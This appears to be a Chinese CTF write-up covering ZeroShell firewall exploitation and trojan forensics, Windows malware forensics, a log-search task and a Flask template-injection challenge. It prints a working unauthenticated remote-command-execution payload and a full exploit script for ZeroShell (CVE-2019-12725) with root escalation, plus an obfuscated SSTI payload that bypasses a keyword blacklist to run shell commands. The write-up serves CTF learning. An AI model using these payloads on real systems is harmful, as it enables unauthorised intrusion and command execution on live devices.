感谢大佬带飞!!!
一:Zeroshell
1、Zeroshell1
思路:工具梭哈
flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}
2、Zeroshell2
题目:通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,提取flag文件内容
(1)通过科普发现ZeroShell防火墙存在远程命令执行漏洞(CVE-2019-12725);尝试利用
#payload 执行id命令
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
(2)利用漏洞点找flag;最后发现flag在Database目录下
c6045425-6e6e-41d0-be09-95682a4f65c4 c6045425-6e6e-41d0-be09-95682a4f65c4
3、Zeroshell3
题目:找出受控机防火墙设备中驻留木马的外联域名或IP地址
思路:使用netstat -ano结合payload查看情况;发现tcp 0 0 61.139.2.100:37516 202.115.89.103:8080 SYN_SENT:本地端口37516正在向远程地址 202.115.89.103:8080 发送连接请求。
flag{202.115.89.103}
4、Zeroshell4
题目:请写出木马进程执行的本体文件的名称
通过netstat -anpo发现权限不足;于是利用payload提升权限
import requests
import sys
import optparse
requests.packages.urllib3.disable_warnings()
def banner():
banner = """
___ _ _ ____ ___ ___ __ ___ __ ___ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \/ )/ _ \ ___/ )(__ \ (__ )(__ \ | __)
( (__ \ / __)(___)/ _/( (_) ))( \_ /(___))( / _/ / / / _/ |__ \\
\___) \/ (____) (____)\___/(__) (_/ (__)(____)(_/ (____)(___/
Author: givemefivw
Usage: python3 CVE-2019-12725.py -u [url] -e [cmd]
"""
print(banner)
def check(url):
try:
payload = """cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d"id"%0A'"""
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
}
res = requests.get(url + payload, headers=header, verify=False, timeout=3)
if res.status_code == 200 and 'uid' in res.text:
print("[*] The Target is Vulnerable! You Can Try to Execute Commond!")
else:
print("[*] The Target is not Vulnerable!")
except KeyboardInterrupt:
sys.exit()
def exec(url, cmd):
try:
payload = """cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d"{0}"%0A'""".format(cmd)
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
}
resp = requests.get(url + payload, headers=header, verify=False, timeout=3)
if resp.status_code == 200:
print("[*] Commond Result is : \n" + resp.text.split("<")[0])
else:
return
except KeyboardInterrupt:
sys.exit()
def main():
paser = optparse.OptionParser()
paser.add_option('-u', '--url', action="store", dest="url", help="-u example.com")
paser.add_option('-e', '--excute', type=str, dest="cmd", help="-c whoami")
options, args = paser.parse_args()
url = options.url
cmd = options.cmd
if url != None and cmd is None:
check(url)
elif cmd != None and url != None:
exec(url, cmd)
if __name__ == "__main__":
banner()
main()
成功提取到root权限
然后用root权限执行netstat -anop
对应的进程号就是10738;然后分析进程:ls -l /proc/10738;成功找到了恶意程序的本体文件
flag{.nginx}
5、Zeroshell5
题目:请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥
思路:现在知道了木马的名称;直接查看;然后搜索202.115.89.103(恶意IP地址发现了密钥)
6、Zeroshell6
题目:请写出驻留木马的启动项,注意写出启动文件的完整路径。
思路:已经知道了木马的文件名称;直接使用grep命令进行查找
grep -r ".nginx" /var
flag{/var/register/system/startup/scripts/nat/File}
二:WinFT
1、winft1
题目:受控机木马的回连域名及ip及端口是?
思路:与上述哪个题目一样;回连IP的特称就是SYN_SENT;直接使用netstat -ano查看端口的开放情况
寻找域名有很多钟方法;第一种就是找到本体文件放到沙箱中;第二种就是查看本机的host的文件;第三种就是在流量包中找ip对应的域名即可
http and ip.addr == 192.168.116.130
2、winft2
问题:受控机启动项中隐藏flag是
思路:启动项在windows中的命令就是msconfig;成功在里面发现了一串奇怪的内容;进行base64解密然html解密拿到flag
3、winft5
思路:分析流量包发现有Everything.zip和flag.txt; 将压缩包提取出来用010发现文件末尾有base64B编码;解码得到压缩包的密码;解压拿到flag
flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC}
4、winft6
通过aes解密就行
三:sc05_1
1、sc05_1
直接搜索防火墙中的134.6.4.12的请求记录,最早的就是:2024/11/09 16:22:42
;这里要注意它有3个sheet,最早的在第一个sheet里,作者就是打开表格后就直接搜IP,其实是在第三个sheet里搜的,搜到的这个IP不是最早的请求,交了之后不对。
四:web
1、Safe_Proxy
题目源码:
from flask import Flask, request, render_template_string
import socket
import threading
import html
app = Flask(__name__)
@app.route('/', methods="GET"])
def source():
with open(__file__, 'r', encoding='utf-8') as f:
return'<pre>'+html.escape(f.read())+'</pre>'
@app.route('/', methods=["POST"])
def template():
template_code = request.form.get("code")
# 安全过滤
blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
for black in blacklist:
if black in template_code:
return"Forbidden content detected!"
result = render_template_string(template_code)
print(result)
return'ok'if result is not None else'error'
class HTTPProxyHandler:
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
def handle_request(self, client_socket):
try:
request_data = b""
while True:
chunk = client_socket.recv(4096)
request_data += chunk
if len(chunk) < 4096:
break
if not request_data:
client_socket.close()
return
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
proxy_socket.connect((self.target_host, self.target_port))
proxy_socket.sendall(request_data)
response_data = b""
while True:
chunk = proxy_socket.recv(4096)
if not chunk:
break
response_data += chunk
header_end = response_data.rfind(b"\r\n\r\n")
if header_end != -1:
body = response_data[header_end + 4:]
else:
body = response_data
response_body = body
response = b"HTTP/1.1 200 OK\r\n" \
b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
b"Content-Type: text/html; charset=utf-8\r\n" \
b"\r\n" + response_body
client_socket.sendall(response)
except Exception as e:
print(f"Proxy Error: {e}")
finally:
client_socket.close()
def start_proxy_server(host, port, target_host, target_port):
proxy_handler = HTTPProxyHandler(target_host, target_port)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(100)
print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")
try:
while True:
client_socket, addr = server_socket.accept()
print(f"Connection from {addr}")
thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
thread.daemon = True
thread.start()
except KeyboardInterrupt:
print("Shutting down proxy server...")
finally:
server_socket.close()
def run_flask_app():
app.run(debug=False, host='127.0.0.1', port=5000)
if __name__ == "__main__":
proxy_host = "0.0.0.0"
proxy_port = 5001
target_host = "127.0.0.1"
target_port = 5000
# 安全反代,防止针对响应头的攻击
proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
proxy_thread.daemon = True
proxy_thread.start()
print("Starting Flask app...")
run_flask_app()
题目给出了源码和waf代码;结合fenjing 和WAFpecher构造payload;首先用WAFpecher在本地起个服务(修改waf);然后使用fenjing生成payload去攻击
{{cycler.next['_'+'_'+'globals'+'_'+'_']['_'+'_'+'builtins'+'_'+'_']['_'+'_'+'i''mport'+'_'+'_']('o''s')['p''open']('cat /flag').read()}}"}
flag{33e867fa-bc40-4031-8075-a16e77a9b5c4}
感谢大佬带飞!!!
扫一扫
2810
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
